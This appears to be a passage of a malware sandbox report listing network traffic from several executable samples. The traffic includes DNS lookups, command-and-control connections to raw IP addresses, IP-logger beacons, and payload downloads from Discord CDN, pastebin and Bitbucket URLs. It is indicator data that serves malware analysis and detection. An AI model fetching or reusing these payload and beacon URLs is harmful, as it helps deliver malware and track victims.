                  Content-Security-Policy: frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net www.atlassian.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ 'nonce-E1r+NLR3AaVi9LMkBbTnxQ=='; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; object-src 'none'; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
                  X-Usage-Quota-Remaining: 998191.117
                  X-Usage-Request-Cost: 1839.10
                  X-Usage-User-Time: 0.047252
                  X-Usage-System-Time: 0.007921
                  X-Usage-Input-Ops: 0
                  X-Usage-Output-Ops: 0
                  Cache-Control: max-age=900
                  Age: 0
                  X-Cache: MISS
                  X-Content-Type-Options: nosniff
                  X-Xss-Protection: 1; mode=block
                  Atl-Traceid: 142c728889704105b282c1636ca046de
                  Atl-Request-Id: 142c7288-8970-4105-b282-c1636ca046de
                  Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                  Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                  Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                  Server-Timing: atl-edge;dur=192,atl-edge-internal;dur=2,atl-edge-upstream;dur=191,atl-edge-pop;desc="aws-eu-west-1"
                • flag-us
                  DNS
                  vsblobprodscussu5shard20.blob.core.windows.net
                  patch.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  vsblobprodscussu5shard20.blob.core.windows.net
                  IN A
                  Response
                  vsblobprodscussu5shard20.blob.core.windows.net
                  IN CNAME
                  blob.sat09prdstrz08a.store.core.windows.net
                  blob.sat09prdstrz08a.store.core.windows.net
                  IN CNAME
                  blob.sat09prdstrz08a.trafficmanager.net
                  blob.sat09prdstrz08a.trafficmanager.net
                  IN A
                  20.150.70.36
                  blob.sat09prdstrz08a.trafficmanager.net
                  IN A
                  20.150.38.228
                  blob.sat09prdstrz08a.trafficmanager.net
                  IN A
                  20.150.79.68
                • flag-us
                  GET
                  https://vsblobprodscussu5shard20.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/13DA6A038B00D25FB112C12EFB833E142050BFD31BF99A3458E647A3C6B0BCCD00.blob?sv=2019-07-07&sr=b&sig=SQDd3mt1T6915rDOpfqyvxSq3uLmAnN2j3%2FWxEPwEnE%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-11-06T07%3A50%3A59Z&ske=2024-11-08T08%3A50%3A59Z&sks=b&skv=2019-07-07&se=2024-11-07T11%3A04%3A41Z&sp=r&rscl=x-e2eid-90714243-7c4c46b5-8996a1cf-3c06f60f-session-e3d62a2e-49994351-a38f8877-ea4f849c
                  patch.exe
                  Remote address:
                  20.150.70.36:443
                  Request
                  GET /b-4712e0edc5a240eabf23330d7df68e77/13DA6A038B00D25FB112C12EFB833E142050BFD31BF99A3458E647A3C6B0BCCD00.blob?sv=2019-07-07&sr=b&sig=SQDd3mt1T6915rDOpfqyvxSq3uLmAnN2j3%2FWxEPwEnE%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-11-06T07%3A50%3A59Z&ske=2024-11-08T08%3A50%3A59Z&sks=b&skv=2019-07-07&se=2024-11-07T11%3A04%3A41Z&sp=r&rscl=x-e2eid-90714243-7c4c46b5-8996a1cf-3c06f60f-session-e3d62a2e-49994351-a38f8877-ea4f849c HTTP/1.1
                  Accept-Encoding: gzip
                  User-Agent: Microsoft-Symbol-Server/10.0.10586.567
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Host: vsblobprodscussu5shard20.blob.core.windows.net
                  Response
                  HTTP/1.1 200 OK
                  Content-Length: 503808
                  Content-Type: application/octet-stream
                  Content-Language: x-e2eid-90714243-7c4c46b5-8996a1cf-3c06f60f-session-e3d62a2e-49994351-a38f8877-ea4f849c
                  Last-Modified: Fri, 02 Feb 2024 04:23:06 GMT
                  Accept-Ranges: bytes
                  ETag: "0x8DC23A6A7A80D5E"
                  Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                  x-ms-request-id: cc23e721-b01e-0060-7c38-30a9b0000000
                  x-ms-version: 2019-07-07
                  x-ms-creation-time: Fri, 02 Feb 2024 04:23:06 GMT
                  x-ms-lease-status: unlocked
                  x-ms-lease-state: available
                  x-ms-blob-type: BlockBlob
                  x-ms-server-encrypted: true
                  Access-Control-Expose-Headers: Content-Length
                  Access-Control-Allow-Origin: *
                  Date: Wed, 06 Nov 2024 10:42:20 GMT
                • flag-us
                  GET
                  https://vsblobprodscussu5shard20.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/13DA6A038B00D25FB112C12EFB833E142050BFD31BF99A3458E647A3C6B0BCCD00.blob?sv=2019-07-07&sr=b&sig=SQDd3mt1T6915rDOpfqyvxSq3uLmAnN2j3%2FWxEPwEnE%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-11-06T07%3A50%3A59Z&ske=2024-11-08T08%3A50%3A59Z&sks=b&skv=2019-07-07&se=2024-11-07T11%3A04%3A41Z&sp=r&rscl=x-e2eid-90714243-7c4c46b5-8996a1cf-3c06f60f-session-e3d62a2e-49994351-a38f8877-ea4f849c
                  patch.exe
                  Remote address:
                  20.150.70.36:443
                  Request
                  GET /b-4712e0edc5a240eabf23330d7df68e77/13DA6A038B00D25FB112C12EFB833E142050BFD31BF99A3458E647A3C6B0BCCD00.blob?sv=2019-07-07&sr=b&sig=SQDd3mt1T6915rDOpfqyvxSq3uLmAnN2j3%2FWxEPwEnE%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-11-06T07%3A50%3A59Z&ske=2024-11-08T08%3A50%3A59Z&sks=b&skv=2019-07-07&se=2024-11-07T11%3A04%3A41Z&sp=r&rscl=x-e2eid-90714243-7c4c46b5-8996a1cf-3c06f60f-session-e3d62a2e-49994351-a38f8877-ea4f849c HTTP/1.1
                  Accept-Encoding: gzip
                  User-Agent: Microsoft-Symbol-Server/10.0.10586.567
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Host: vsblobprodscussu5shard20.blob.core.windows.net
                  Response
                  HTTP/1.1 200 OK
                  Content-Length: 503808
                  Content-Type: application/octet-stream
                  Content-Language: x-e2eid-90714243-7c4c46b5-8996a1cf-3c06f60f-session-e3d62a2e-49994351-a38f8877-ea4f849c
                  Last-Modified: Fri, 02 Feb 2024 04:23:06 GMT
                  Accept-Ranges: bytes
                  ETag: "0x8DC23A6A7A80D5E"
                  Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                  x-ms-request-id: cc23ee48-b01e-0060-5b38-30a9b0000000
                  x-ms-version: 2019-07-07
                  x-ms-creation-time: Fri, 02 Feb 2024 04:23:06 GMT
                  x-ms-lease-status: unlocked
                  x-ms-lease-state: available
                  x-ms-blob-type: BlockBlob
                  x-ms-server-encrypted: true
                  Access-Control-Expose-Headers: Content-Length
                  Access-Control-Allow-Origin: *
                  Date: Wed, 06 Nov 2024 10:42:22 GMT
                • flag-us
                  DNS
                  dumancue.com
                  regsvr32.exe
                  Remote address:
                  8.8.8.8:53
                  Request
                  dumancue.com
                  IN A
                  Response
                • 212.193.30.45:80
                  http://212.193.30.45/proxies.txt
                  http
                  Mon166dc6040fb8726.exe
                  371 B
                   962 B
                   6
                  4

                  HTTP Request

                  GET http://212.193.30.45/proxies.txt

                  HTTP Response

                  301
                • 212.193.30.45:443
                  tls
                  Mon166dc6040fb8726.exe
                  325 B
                   219 B
                   5
                  5
                • 212.193.30.45:443
                  tls
                  Mon166dc6040fb8726.exe
                  334 B
                   219 B
                   6
                  5
                • 212.193.30.29:80
                  Mon166dc6040fb8726.exe
                  152 B
                   3
                • 52.203.72.196:443
                  www.listincode.com
                  Mon1631358b82299bd8.exe
                  152 B
                   120 B
                   3
                  3
                • 208.95.112.1:80
                  http://ip-api.com/json/
                  http
                  Mon1618e4439d986270.exe
                  728 B
                   558 B
                   5
                  2

                  HTTP Request

                  GET http://ip-api.com/json/

                  HTTP Response

                  200
                • 54.84.177.46:443
                  www.listincode.com
                  Mon1631358b82299bd8.exe
                  152 B
                   120 B
                   3
                  3
                • 135.181.129.119:4805
                  Mon16d070a064013c841.exe
                  152 B
                   120 B
                   3
                  3
                • 162.159.133.233:443
                  https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe
                  tls, http
                  Mon164c5af508c3.exe
                  6.9kB
                   37.5kB
                   64
                  53

                  HTTP Request

                  GET https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe

                  HTTP Response

                  404

                  HTTP Request

                  GET https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe

                  HTTP Response

                  404

                  HTTP Request

                  GET https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe

                  HTTP Response

                  404

                  HTTP Request

                  GET https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe

                  HTTP Response

                  404

                  HTTP Request

                  GET https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe

                  HTTP Response

                  404

                  HTTP Request

                  GET https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe

                  HTTP Response

                  404

                  HTTP Request

                  GET https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe

                  HTTP Response

                  404

                  HTTP Request

                  GET https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe

                  HTTP Response

                  404

                  HTTP Request

                  GET https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe

                  HTTP Response

                  404

                  HTTP Request

                  GET https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe

                  HTTP Response

                  404

                  HTTP Request

                  GET https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe

                  HTTP Response

                  404

                  HTTP Request

                  GET https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe

                  HTTP Response

                  404

                  HTTP Request

                  GET https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe

                  HTTP Response

                  404

                  HTTP Request

                  GET https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe

                  HTTP Response

                  404

                  HTTP Request

                  GET https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe

                  HTTP Response

                  404

                  HTTP Request

                  GET https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe

                  HTTP Response

                  404

                  HTTP Request

                  GET https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe

                  HTTP Response

                  404

                  HTTP Request

                  GET https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe

                  HTTP Response

                  404

                  HTTP Request

                  GET https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe

                  HTTP Response

                  404

                  HTTP Request

                  GET https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe

                  HTTP Response

                  404

                  HTTP Request

                  GET https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe

                  HTTP Response

                  404

                  HTTP Request

                  GET https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe

                  HTTP Response

                  404

                  HTTP Request

                  GET https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe

                  HTTP Response

                  404

                  HTTP Request

                  GET https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe

                  HTTP Response

                  404

                  HTTP Request

                  GET https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe

                  HTTP Response

                  404

                  HTTP Request

                  GET https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe

                  HTTP Response

                  404

                  HTTP Request

                  GET https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe

                  HTTP Response

                  404

                  HTTP Request

                  GET https://cdn.discordapp.com/attachments/910281601559167006/912364128956461126/download.exe

                  HTTP Response

                  404
                • 104.26.3.46:443
                  https://iplogger.org/143up7
                  tls, http
                  Mon1631358b82299bd8.exe
                  1.2kB
                   14.5kB
                   14
                  19

                  HTTP Request

                  GET https://iplogger.org/143up7

                  HTTP Response

                  403
                • 104.26.3.46:443
                  https://iplogger.org/1Brhn7
                  tls, http
                  Mon161bd381a14aea5c.exe
                  804 B
                   4.7kB
                   9
                  10

                  HTTP Request

                  GET https://iplogger.org/1Brhn7

                  HTTP Response

                  200
                • 91.121.67.60:51630
                  Mon16734014a69dec.exe
                  152 B
                   3
                • 104.26.3.46:443
                  https://iplogger.org/1Bthn7
                  tls, http
                  Mon161bd381a14aea5c.exe
                  1.0kB
                   13.5kB
                   14
                  19

                  HTTP Request

                  GET https://iplogger.org/1Bthn7

                  HTTP Response

                  403
                • 142.250.187.227:80
                  http://c.pki.goog/r/r4.crl
                  http
                  Mon1631358b82299bd8.exe
                  560 B
                   5.0kB
                   7
                  6

                  HTTP Request

                  GET http://c.pki.goog/r/gsr1.crl

                  HTTP Response

                  200

                  HTTP Request

                  GET http://c.pki.goog/r/r4.crl

                  HTTP Response

                  200
                • 135.181.129.119:4805
                  Mon16d070a064013c841.exe
                  152 B
                   120 B
                   3
                  3
                • 135.181.79.37:10902
                  AppLaunch.exe
                  152 B
                   120 B
                   3
                  3
                • 135.181.129.119:4805
                  Mon16d070a064013c841.exe
                  152 B
                   120 B
                   3
                  3
                • 135.181.79.37:10902
                  AppLaunch.exe
                  152 B
                   120 B
                   3
                  3
                • 172.67.19.24:443
                  https://pastebin.com/raw/A7dSG1te
                  tls, http
                  Mon166dc6040fb8726.exe
                  883 B
                   6.3kB
                   11
                  11

                  HTTP Request

                  GET https://pastebin.com/raw/A7dSG1te

                  HTTP Response

                  404
                • 104.21.5.208:80
                  http://wfsdragon.ru/api/setStats.php
                  http
                  Mon166dc6040fb8726.exe
                  374 B
                   2.1kB
                   6
                  5

                  HTTP Request

                  GET http://wfsdragon.ru/api/setStats.php

                  HTTP Response

                  404
                • 212.192.241.62:80
                  Mon166dc6040fb8726.exe
                  152 B
                   3
                • 135.181.129.119:4805
                  Mon16d070a064013c841.exe
                  152 B
                   120 B
                   3
                  3
                • 135.181.79.37:10902
                  AppLaunch.exe
                  152 B
                   120 B
                   3
                  3
                • 135.181.129.119:4805
                  Mon16d070a064013c841.exe
                  152 B
                   120 B
                   3
                  3
                • 135.181.79.37:10902
                  AppLaunch.exe
                  152 B
                   120 B
                   3
                  3
                • 91.121.67.60:51630
                  Mon16734014a69dec.exe
                  152 B
                   3
                • 135.181.129.119:4805
                  Mon16d070a064013c841.exe
                  152 B
                   120 B
                   3
                  3
                • 135.181.79.37:10902
                  AppLaunch.exe
                  152 B
                   120 B
                   3
                  3
                • 135.181.129.119:4805
                  Mon16d070a064013c841.exe
                  152 B
                   120 B
                   3
                  3
                • 135.181.79.37:10902
                  AppLaunch.exe
                  152 B
                   120 B
                   3
                  3
                • 2.19.117.18:80
                  http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
                  http
                  399 B
                   1.7kB
                   4
                  4

                  HTTP Request

                  GET http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl

                  HTTP Response

                  200
                • 44.221.84.105:443
                  server14.trumops.com
                  tls
                  csrss.exe
                  15.1kB
                   9.4kB
                   28
                  22
                • 204.79.197.219:443
                  https://msdl.microsoft.com/download/symbols/winload_prod.pdb/768283CA443847FB8822F9DB1F36ECC51/winload_prod.pdb
                  tls, http
                  patch.exe
                  2.9kB
                   10.8kB
                   18
                  21

                  HTTP Request

                  GET https://msdl.microsoft.com/download/symbols/index2.txt

                  HTTP Response

                  404

                  HTTP Request

                  GET https://msdl.microsoft.com/download/symbols/ntkrnlmp.pdb/AAF33CF37E194E98957768CF9C02DE8E2/ntkrnlmp.pdb

                  HTTP Response

                  302

                  HTTP Request

                  GET https://msdl.microsoft.com/download/symbols/ntkrnlmp.pdb/AAF33CF37E194E98957768CF9C02DE8E2/ntkrnlmp.pdb

                  HTTP Response

                  302

                  HTTP Request

                  GET https://msdl.microsoft.com/download/symbols/index2.txt

                  HTTP Response

                  404

                  HTTP Request

                  GET https://msdl.microsoft.com/download/symbols/winload_prod.pdb/768283CA443847FB8822F9DB1F36ECC51/winload_prod.pdb

                  HTTP Response

                  302

                  HTTP Request

                  GET https://msdl.microsoft.com/download/symbols/winload_prod.pdb/768283CA443847FB8822F9DB1F36ECC51/winload_prod.pdb

                  HTTP Response

                  302
                • 135.181.129.119:4805
                  Mon16d070a064013c841.exe
                  152 B
                   120 B
                   3
                  3
                • 20.150.38.228:443
                  https://vsblobprodscussu5shard30.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&sig=%2FxsjkN39CC6LP0h7uJgSAEGDHAi7Llx1tU6X23AHu20%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-11-06T07%3A50%3A45Z&ske=2024-11-08T08%3A50%3A45Z&sks=b&skv=2019-07-07&se=2024-11-07T11%3A19%3A29Z&sp=r&rscl=x-e2eid-5753d87c-9b4642ce-9883fe3b-b84c3775-session-27d00721-1bc54196-83082981-5c453f26
                  tls, http
                  patch.exe
                  357.3kB
                   18.1MB
                   7474
                  13003

                  HTTP Request

                  GET https://vsblobprodscussu5shard30.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&sig=%2FxsjkN39CC6LP0h7uJgSAEGDHAi7Llx1tU6X23AHu20%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-11-06T07%3A50%3A45Z&ske=2024-11-08T08%3A50%3A45Z&sks=b&skv=2019-07-07&se=2024-11-07T11%3A19%3A29Z&sp=r&rscl=x-e2eid-5753d87c-9b4642ce-9883fe3b-b84c3775-session-27d00721-1bc54196-83082981-5c453f26

                  HTTP Response

                  200

                  HTTP Request

                  GET https://vsblobprodscussu5shard30.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/532FE4B89C0696BBB1F353A7F1CAFE02D477AF8648ED3B34046FF47FBB7FF1EC00.blob?sv=2019-07-07&sr=b&sig=%2FxsjkN39CC6LP0h7uJgSAEGDHAi7Llx1tU6X23AHu20%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-11-06T07%3A50%3A45Z&ske=2024-11-08T08%3A50%3A45Z&sks=b&skv=2019-07-07&se=2024-11-07T11%3A19%3A29Z&sp=r&rscl=x-e2eid-5753d87c-9b4642ce-9883fe3b-b84c3775-session-27d00721-1bc54196-83082981-5c453f26

                  HTTP Response

                  200
                • 135.181.79.37:10902
                  AppLaunch.exe
                  152 B
                   120 B
                   3
                  3
                • 185.166.142.21:443
                  https://bitbucket.org/chege3/softwarellc/downloads/SFS.jpg
                  tls, http
                  Build.exe
                  1.2kB
                   24.1kB
                   17
                  23

                  HTTP Request

                  GET https://bitbucket.org/chege3/softwarellc/downloads/SFS.jpg

                  HTTP Response

                  404
                • 135.181.129.119:4805
                  Mon16d070a064013c841.exe
                  152 B
                   120 B
                   3
                  3
                • 135.181.79.37:10902
                  AppLaunch.exe
                  152 B
                   120 B
                   3
                  3
                • 72.84.118.132:8080
                  regsvr32.exe
                  152 B
                   3
                • 91.121.67.60:51630
                  Mon16734014a69dec.exe
                  152 B
                   3
                • 135.181.129.119:4805
                  Mon16d070a064013c841.exe
                  152 B
                   120 B
                   3
                  3
                • 135.181.79.37:10902
                  AppLaunch.exe
                  152 B
                   120 B
                   3
                  3
                • 135.181.129.119:4805
                  Mon16d070a064013c841.exe
                  152 B
                   120 B
                   3
                  3
                • 20.150.70.36:443
                  https://vsblobprodscussu5shard20.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/13DA6A038B00D25FB112C12EFB833E142050BFD31BF99A3458E647A3C6B0BCCD00.blob?sv=2019-07-07&sr=b&sig=SQDd3mt1T6915rDOpfqyvxSq3uLmAnN2j3%2FWxEPwEnE%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-11-06T07%3A50%3A59Z&ske=2024-11-08T08%3A50%3A59Z&sks=b&skv=2019-07-07&se=2024-11-07T11%3A04%3A41Z&sp=r&rscl=x-e2eid-90714243-7c4c46b5-8996a1cf-3c06f60f-session-e3d62a2e-49994351-a38f8877-ea4f849c
                  tls, http
                  patch.exe
                  21.7kB
                   1.1MB
                   426
                  758

                  HTTP Request

                  GET https://vsblobprodscussu5shard20.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/13DA6A038B00D25FB112C12EFB833E142050BFD31BF99A3458E647A3C6B0BCCD00.blob?sv=2019-07-07&sr=b&sig=SQDd3mt1T6915rDOpfqyvxSq3uLmAnN2j3%2FWxEPwEnE%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-11-06T07%3A50%3A59Z&ske=2024-11-08T08%3A50%3A59Z&sks=b&skv=2019-07-07&se=2024-11-07T11%3A04%3A41Z&sp=r&rscl=x-e2eid-90714243-7c4c46b5-8996a1cf-3c06f60f-session-e3d62a2e-49994351-a38f8877-ea4f849c

                  HTTP Response

                  200

                  HTTP Request

                  GET https://vsblobprodscussu5shard20.blob.core.windows.net/b-4712e0edc5a240eabf23330d7df68e77/13DA6A038B00D25FB112C12EFB833E142050BFD31BF99A3458E647A3C6B0BCCD00.blob?sv=2019-07-07&sr=b&sig=SQDd3mt1T6915rDOpfqyvxSq3uLmAnN2j3%2FWxEPwEnE%3D&skoid=4866d8d7-57cb-4216-997d-bade18bdbe68&sktid=33e01921-4d64-4f8c-a055-5bdaffd5e33d&skt=2024-11-06T07%3A50%3A59Z&ske=2024-11-08T08%3A50%3A59Z&sks=b&skv=2019-07-07&se=2024-11-07T11%3A04%3A41Z&sp=r&rscl=x-e2eid-90714243-7c4c46b5-8996a1cf-3c06f60f-session-e3d62a2e-49994351-a38f8877-ea4f849c

                  HTTP Response

                  200
                • 135.181.79.37:10902
                  AppLaunch.exe
                  152 B
                   120 B
                   3
                  3
                • 135.181.129.119:4805
                  Mon16d070a064013c841.exe
                  152 B
                   80 B
                   3
                  2
                • 135.181.79.37:10902
                  AppLaunch.exe
                  152 B
                   120 B
                   3
                  3
                • 72.84.118.132:8080
                  regsvr32.exe
                  152 B
                   3
                • 135.181.79.37:10902
                  AppLaunch.exe
                  152 B
                   120 B
                   3
                  3
                • 135.181.129.119:4805
                  Mon16d070a064013c841.exe
                  152 B
                   120 B
                   3
                  3
                • 91.121.67.60:51630
                  Mon16734014a69dec.exe
                  152 B
                   3
                • 135.181.79.37:10902
                  AppLaunch.exe
                  152 B
                   120 B
                   3
                  3
                • 135.181.129.119:4805
                  Mon16d070a064013c841.exe
                  152 B
                   120 B
                   3
                  3
                • 135.181.79.37:10902
                  AppLaunch.exe
                  152 B
                   120 B
                   3
                  3
                • 135.181.129.119:4805
                  Mon16d070a064013c841.exe
                  152 B
                   120 B
                   3
                  3
                • 135.181.79.37:10902
                  AppLaunch.exe
                  152 B
                   120 B
                   3
                  3
                • 135.181.129.119:4805
                  Mon16d070a064013c841.exe
                  152 B
                   120 B
                   3
                  3
                • 135.181.79.37:10902
                  AppLaunch.exe
                  152 B
                   120 B
                   3
                  3
                • 135.181.129.119:4805
                  Mon16d070a064013c841.exe
                  152 B
                   120 B
                   3
                  3
                • 91.121.67.60:51630
                  Mon16734014a69dec.exe
                  152 B
                   3
                • 135.181.79.37:10902
                  AppLaunch.exe
                  152 B
                   120 B
                   3
                  3
                • 135.181.129.119:4805
                  Mon16d070a064013c841.exe
                  152 B
                   120 B
                   3
                  3
                • 135.181.79.37:10902
                  AppLaunch.exe
                  152 B
                   120 B
                   3
                  3
                • 135.181.129.119:4805
                  Mon16d070a064013c841.exe
                  152 B
                   120 B
                   3
                  3
                • 135.181.79.37:10902
                  AppLaunch.exe
                  152 B
                   120 B
                   3
                  3
                • 135.181.129.119:4805
                  Mon16d070a064013c841.exe
                  152 B
                   120 B
                   3
                  3
                • 135.181.79.37:10902
                  AppLaunch.exe
                  152 B
                   120 B
                   3
                  3
                • 135.181.129.119:4805
                  Mon16d070a064013c841.exe
                  152 B
                   120 B
                   3
                  3
                • 91.121.67.60:51630
                  Mon16734014a69dec.exe
                  104 B
                   2
                • 135.181.79.37:10902
                  AppLaunch.exe
                  152 B
                   120 B
                   3
                  3
                • 135.181.129.119:4805
                  Mon16d070a064013c841.exe
                  152 B
                   120 B
                   3
                  3
                • 44.221.84.105:443
                  server14.trumops.com
                  tls
                  csrss.exe
                  1.6kB
                   5.2kB
                   8
                  8
                • 135.181.79.37:10902
                  AppLaunch.exe
                  152 B
                   120 B
                   3
                  3
                • 8.8.8.8:53
                  www.listincode.com
                  dns
                  Mon1631358b82299bd8.exe
                  64 B
                   185 B
                   1
                  1

                  DNS Request

                  www.listincode.com

                  DNS Response

                  52.203.72.196
                  54.84.177.46

                • 8.8.8.8:53
                  56.jpgamehome.com
                  dns
                  Mon16e127a54386dd68.exe
                  63 B
                   136 B
                   1
                  1

                  DNS Request

                  56.jpgamehome.com

                • 8.8.8.8:53
                  tweakballs.com
                  dns
                  Mon16737798ac26f984.tmp
                  60 B
                   133 B
                   1
                  1

                  DNS Request

                  tweakballs.com

                • 8.8.8.8:53
                  ip-api.com
                  dns
                  Mon1618e4439d986270.exe
                  56 B
                   72 B
                   1
                  1

                  DNS Request

                  ip-api.com

                  DNS Response

                  208.95.112.1

                • 8.8.8.8:53
                  cdn.discordapp.com
                  dns
                  Mon164c5af508c3.exe
                  64 B
                   144 B
                   1
                  1

                  DNS Request

                  cdn.discordapp.com

                  DNS Response

                  162.159.133.233
                  162.159.129.233
                  162.159.130.233
                  162.159.135.233
                  162.159.134.233

                • 8.8.8.8:53
                  webdatingcompany.me
                  dns
                  Mon161bd381a14aea5c.exe
                  65 B
                   131 B
                   1
                  1

                  DNS Request

                  webdatingcompany.me

                • 8.8.8.8:53
                  all-mobile-pa1ments.com.mx
                  dns
                  Mon161bd381a14aea5c.exe
                  72 B
                   131 B
                   1
                  1

                  DNS Request

                  all-mobile-pa1ments.com.mx

                • 8.8.8.8:53
                  buy-fantasy-football.com.sg
                  dns
                  Mon161bd381a14aea5c.exe
                  73 B
                   122 B
                   1
                  1

                  DNS Request

                  buy-fantasy-football.com.sg

                • 8.8.8.8:53
                  buy-fantasy-gxmes.com.sg
                  dns
                  Mon161bd381a14aea5c.exe
                  70 B
                   119 B
                   1
                  1

                  DNS Request

                  buy-fantasy-gxmes.com.sg

                • 8.8.8.8:53
                  topniemannpickshop.cc
                  dns
                  Mon161bd381a14aea5c.exe
                  67 B
                   134 B
                   1
                  1

                  DNS Request

                  topniemannpickshop.cc

                • 8.8.8.8:53
                  iplogger.org
                  dns
